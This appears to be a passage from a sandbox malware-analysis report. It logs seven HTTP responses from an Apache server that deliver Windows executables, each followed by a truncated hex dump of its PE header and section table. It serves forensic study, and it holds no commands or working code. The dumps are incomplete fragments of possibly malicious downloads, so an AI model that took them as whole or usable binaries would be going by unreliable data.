Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:24:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 07:25:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
